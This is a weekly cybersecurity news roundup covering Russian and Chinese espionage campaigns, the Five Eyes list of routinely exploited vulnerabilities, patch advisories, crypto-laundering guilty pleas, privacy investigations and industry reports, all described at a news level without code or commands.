At a glance.
- US hunts Chinese malware staged in US networks.
- SVR cyberespionage on several fronts.
- The FSB shakes up its infrastructure.
- C2-as-a-service (and APTs are the customers).
- Five Eyes warn against top exploited vulnerabilities.
- Patch news.
- Crime and punishment.
- Courts and torts.
- Policies, procurements, and agency equities.
- Fortunes of commerce.
- Labor markets.
US hunts Chinese malware staged in US networks.
On Saturday the New York Times, citing unnamed Administration officials, reported that the US was hunting for disruptive Chinese malware that's been quietly staged in US systems. The Times' report is the result of interviews conducted over the past two months. The consensus among both government and industry experts is that Volt Typhoon precedes Microsoft's report "by at least a year." Investigation has shown that the Chinese campaign is more widespread than initially believed, and that the US work to find and "eradicate" the malware has been in progress for some time. The infestation extends beyond telecommunication systems and is, geographically global, not confined to Guam or even to US territory, but there do seem to be higher concentrations of the malware in the vicinity of US military installations.
SVR cyberespionage on several fronts.
Recorded Future's Insikt Group is tracking a cyberespionage campaign against diplomatic services that Russia's SVR ran between February and June of this year. The researchers don't have a great deal of direct insight into the targets' environment, but their reasonable conjecture is that the operation has reflected Russia's continuing interest in European governments, especially their diplomats. As is commonly the case, the attack begins with spearphishing, the phishbait being such lures as an ambassador's schedule, an invitation to an embassy reception, or, in a case we've seen before, an ad for a used BMW.
The message redirects to a compromised domain from which BlueBravo (as Recorded Future calls the SVR threat actor) installs malware that gives it persistence in the target's network. BlueBravo has cycled through at least three major tools this year. The one most recently used the researchers call "GraphicalProton," a loader that's staged in an ISO or ZIP file. GraphicalProton exploits legitimate services, especially Microsoft OneDrive for delivery to the target.
In a separate case, investigators have concluded that a cyberespionage campaign against Norwegian government networks lasted four months before it was detected and action taken to stop it, Bloomberg reports. The effort, generally attributed to Russian intelligence services, exploited a now-patched vulnerability in Ivanti Endpoint Manager Mobile. Yesterday the US Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) released a joint Cybersecurity Advisory (CSA) on the incident.
Microsoft reported this week that the Russian threat group Midnight Blizzard (which Redmond formerly tracked as Nobelium, and which US and British intelligence services identify as an operation of Russia's SVR) is currently engaged in highly targeted social engineering attacks against a range of Western targets. The goal of the operation, as is almost invariably the case with SVR work, is espionage. The present campaign is credential phishing, and it uses security-themed subdomains as phishbait. The attack is staged from previously compromised Microsoft 365 tenants owned by small businesses, and it's designed to capture authentication tokens that can be used in further attacks. The attack typically proceeds in three stages. The first step is a request to chat in Microsoft Teams. That request often impersonates a technical support or security team member. The next step requests action on the target's authentication app, direction to enter a code into their Microsoft Authenticator app. The third step is successful multifactor authentication. "If the targeted user accepts the message request and enters the code into the Microsoft Authenticator app, the threat actor is granted a token to authenticate as the targeted user," Microsoft explains. "The actor gains access to the user’s Microsoft 365 account, having completed the authentication flow." From this point Midnight Blizzard enters its post-compromise phase, which involves information theft and, in some instances, the addition of a managed device to the organization's network.
The SVR is casting a wide net. Its targets are found in the government, non-governmental organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors.
The FSB shakes up its infrastructure.
Industry research has been exposing Russian cyber operations, and the increased light this has shed on their activities has led Russia's FSB to add a number of domains to its attack infrastructure the better to escape unwanted scrutiny. Recorded Future reports that the FSB activity it tracks as BlueCharlie (Microsoft calls it "Star Blizzard," formerly "Seaborgium") has registered ninety-four new domains for its infrastructure. That infrastructure supports credential-harvesting, intelligence collection, and hack-and-leak operations. The FSB's targets are Ukraine and members of the NATO alliance. The hack-and-leak operations follow an FSB tradition of going beyond simple collection and analysis to conduct activities online that create and develop narratives that support Russian disinformation.
C2-as-a-service (and APTs are the customers).
Researchers at Halcyon have published a report looking at command-and-control providers used by ransomware gangs. Specifically, the researchers point to the Cloudzy virtual private server (VPS) provider as “the common service provider supporting ransomware attacks and other cybercriminal endeavors.” Cloudzy is incorporated in the US, but the researchers believe the company “almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions.”
The researchers state, “Threat actors that are assessed to be leveraging Cloudzy include APT groups tied to the Chinese, Iranian, North Korean, Russian, Indian, Pakistani, and Vietnamese governments; a sanctioned Israeli spyware vendor whose tools are known to target civilians; several criminal syndicates and ransomware affiliates whose campaigns have spurred international headlines.”
Five Eyes warn against top exploited vulnerabilities.
Intelligence services in the Five Eyes on Thursday issued a joint Cybersecurity Advisory (CSA), 2022 Top Routinely Exploited Vulnerabilities, describing the vulnerabilities that attackers have used most often last year. They’re still relevant, still a matter of concern. Here are the vulnerabilities atop the list:
- CVE-2018-13379. This one affects Fortinet SSL VPNs. It’s also been exploited as far back as 2020. The advisory points out that its continued exploitation shows how laggard organizations tend to be in patching.
- CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These are the ProxyShell vulnerabilities, and they affect Microsoft Exchange email servers. When they’re exploited together, they can enable remote code execution in the target.
- CVE-2021-40539. Exploitation of this one enables unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus. This is another old one, with exploitation observed since late 2021. It’s also been, the advisory says, “linked to the usage of an outdated third-party dependency.”
- CVE-2021-26084. This one afflicts Atlassian Confluence Server and Data Center, and its exploitation also enables unauthenticated arbitrary code execution. The vulnerable system is a web-based collaboration tool used by both governments and private companies. It rose quickly up the leader board after a proof-of-concept was published within a week of the vulnerability’s disclosure. Mass exploitation was first observed in 2021.
- CVE-2021- 44228. This one is famous as Log4Shell. It affects Apache’s Log4j library, which is an open-source logging framework used by thousands of products worldwide. An attacker can exploit Log4Shell with a specially crafted request to a vulnerable system, leading to arbitrary code execution. Such a request can allow an attacker to take full control of a system. At that point the bad actor can steal information, stage ransomware, or conduct a range of other hostile and malicious activity. The advisory says, “Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.”
- CVE-2022-22954, CVE-2022-22960. These two vulnerabilities allow remote code execution, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. The advisory cautions, “A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.”
- CVE-2022-1388. This vulnerability allows unauthenticated actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
- CVE-2022-30190. This one affects the Windows Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated actor could exploit CVE-2022-30190 to take control of an affected system.
- And, finally, CVE-2022-26134, a critical remote-code execution vulnerability that affects Atlassian Confluence and Data Center. This one was probably first exploited as a zero-day before its public disclosure in June of last year.
It’s worth noting how many of the vulnerabilities continued to be exploited after patches were available. It suggests the effect that slow patching can have on an organization. As CISA so often says, “Apply updates per vendor instructions,” and, we might add, sooner rather than later.
Patch news.
The US Cybersecurity and Infrastructure Security Agency (CISA) published three malware analysis reports on malware variants exploiting CVE-2023-2868, a remote command injection vulnerability affecting Barracuda Email Security Gateways (ESGs). One of the malware strains, called “Submarine,” was deployed by the suspected Chinese threat actor UNC4841, BleepingComputer reports. Barracuda has offered mitigations, and even replacement of affected devices.
And this isn't a patch, strictly speaking, but rather advice on proper configuration of a useful and powerful tool. The US National Security Agency (NSA) has issued guidance on how to harden Cisco next-generation firewalls (NGFW). NGFWs offer substantial security capabilities, but they require proper implementation. The agency's Cisco Firepower Hardening Guide offers detailed advice on how to configure the NGFWs to defend networks against sophisticated and persistent threats.
Crime and punishment.
Ukraine's Security Service announced that it had disrupted a network of illicit fund-transfer sites that were engaged in converting Russian rubles into Ukrainian hryvnia. The network made use of various sanctioned Russian crypto payment services to turnover currency each month worth more than $4 million, Bank Info Security reports. The Security Service of Ukraine said that "underground exchange points" were found and shuttered in Kyiv, Kharkiv, Rivne, and Sumy.
Razzlekhan and her inamorata, now being called "the Crypto Couple" or "the Bitcoin Bonnie and Clyde," have entered their guilty pleas. Heather Morgan (noms de rap "Razzlekahn" and "the crocodile of Wall Street") and Ilya Lichtenstein copped a plea to to money laundering. Mr. Lichtenstein admitted to doing the actual hacking; Ms Morgan took a plea to conspiracy to launder money and conspiracy to defraud the United States. He faces up to twenty years on his single count; she faces up to five years on each of her two counts. They took a lot of alt-coin, back in the day: 120,000 in Bitcoin that's presently worth $4.5 billion. There's irony in how they were caught. The power couple used some of their vast wealth on a couple of Walmart gift cards (they bought an Uber ride and a Play Station) which proved the essential spoor that put law enforcement on their trail, and the rest was history. You'd think with a billion and change you'd be more inclined to take your trade to Burberry, say, or Hermès, but hey, chacun à son goût. Or is there sometimes a connection between greed and a zeal for reliable merchandise at an affordable price? Discuss among yourselves.
Courts and torts.
On Monday the California Privacy Protection Agency (CPPA) announced it’s launching an investigation into the data practices of internet-connected cars. Established in 2020, the agency was granted the authority as of July 1 to conduct operations that help residents of the US state of California to better understand and control what data is being collected from them. This probe will be the first application of this new power. As the Washington Post explains, smart cars have become increasingly popular in recent years, and it has become difficult to find a modern car that doesn’t have some internet-connectivity. Ashkan Soltani, CPPA’s executive director, states, “Modern vehicles are effectively connected computers on wheels. They’re able to collect a wealth of information via built-in apps, sensors, and cameras, which can monitor people both inside and near the vehicle.” The data collected from drivers – which includes web histories, driving habits, and movement tracking that can reveal information about everything from religious practices to medical histories – is highly valuable to data brokers as well as insurance companies, and many users are unaware of their data privacy rights. Soltani continues, “Our Enforcement Division is making inquiries into the connected vehicle space to understand how these companies are complying with California law when they collect and use consumers’ data.”
German data regulator the Bavarian State Office for Data Protection Supervision has revealed it’s been investigating WorldCoin, a project that collects user biometric data – an iris scan, to be exact – in an effort to create an "identity and financial network." WorldCoin, which officially launched last week, is run by Sam Altman, CEO of controversial artificial intelligence research lab OpenAI, Molly White explains. Like something out of an episode of Black Mirror, users' irises are scanned by an ominous-looking silver orb, and in exchange receive a digital ID which can then be used as verification for cryptocurrency transactions. During the trial period over the past two years, WorldCoin says 2.1 million people have signed up for the program at sites in various countries including France, Germany and Spain, mostly during a trial period over the last two years.
Policies, procurements, and agency equities.
The White House, through the Office of the National Cyber Director, released the National Cyber Workforce and Education Strategy this week. The plan builds on the National Cybersecurity Strategy, released on March 1st of this year. It's an ambitious, "whole-of-nation" effort. A number of agencies have been given specific roles and missions, and the strategy includes a long and heterogeneous list of private-sector partners. The strategy isn't confined to educating Americans for jobs in the cybersecurity workforce. One of its objectives is to raise cybersecurity awareness and basic skills among the population at large. The motivation for this aspect of the strategy is the pervasiveness of activities in cyberspace in commerce and other aspects of daily life. The document "charts a course for preparing Americans for today’s jobs and enable everyone to participate fully in our interconnected society."
The White House also has expressed its strong support for reauthorization of the controversial Section 702 surveillance authorization. The Register reports that the Administration made its stance even clearer by releasing the "vast majority" of the President's Intelligence Advisory Board (PIAB) report on the intelligence community’s surveillance power as support for reauthorization. The statement from the White House reads, "We agree with the unanimous conclusion reached by this group of independent, deeply experienced experts that failure to reauthorize Section 702 could be 'one of the worst intelligence failures of our time.’” While the report does recommend renewal, it also confirms that "complacency, a lack of proper procedures, and the sheer volume of Section 702 activity led to FBI's inappropriate use" of its powers.
Fortunes of commerce.
DataTribe has published a report on the cybersecurity market in Q2 2023, outlining the following findings:
- "Seeds for Growth: Deal volume for early-stage cyber companies started to rebound in Q2. With 47 deals, Q2 increased from the depths of Q1 by nearly 50 percent. The data shows significantly fewer early-stage deals than in 2022 but at healthy valuations. A flight to quality in venture capital persists. The performance bar that will attract venture capital remains exceptionally high.
- "End of Runway May Be Closer Than It Appears: We are approaching the end of the runway for startups that sat on the fundraising sidelines for the past 18-24 months. We could see a lot of bumpy landings coming down the pike. This will be more acute for cash-burning later-stage companies. There were only four growth-stage cybersecurity deals in Q223, on par with Q123. Year-over-year, deal volume is down 75% (16 to 4) at this stage.
- "AI Pixie Dust Doesn’t Drive Value, AI Productivity Will: In the first half of 2023, AI companies raised $25B, slightly down from $29B in H1 2022. AI was down just 14% YoY in the same period, while global venture capital declined 50%. But, companies need to show that AI is more than a buzzword. How can companies best position their AI capabilities in a manner that attracts customers and investors without overblowing expectations?"
Labor markets.
Immersive Labs has released its Cyber Workforce Benchmark Report, noting significant improvements in response time to cyber incidents. The report notes “Organizations’ median response time to emerging threats improved by one-third, indicating a significant increase in the speed of response and continued progress compared to the year prior. Enterprises have enhanced their knowledge about newly discovered threats and vulnerabilities, enabling them to respond more rapidly than ever before.” The researchers point to the Log4j crisis as “a watershed moment that could well have been a catalyst for this urgency given its catastrophic impact on organizations around the world.”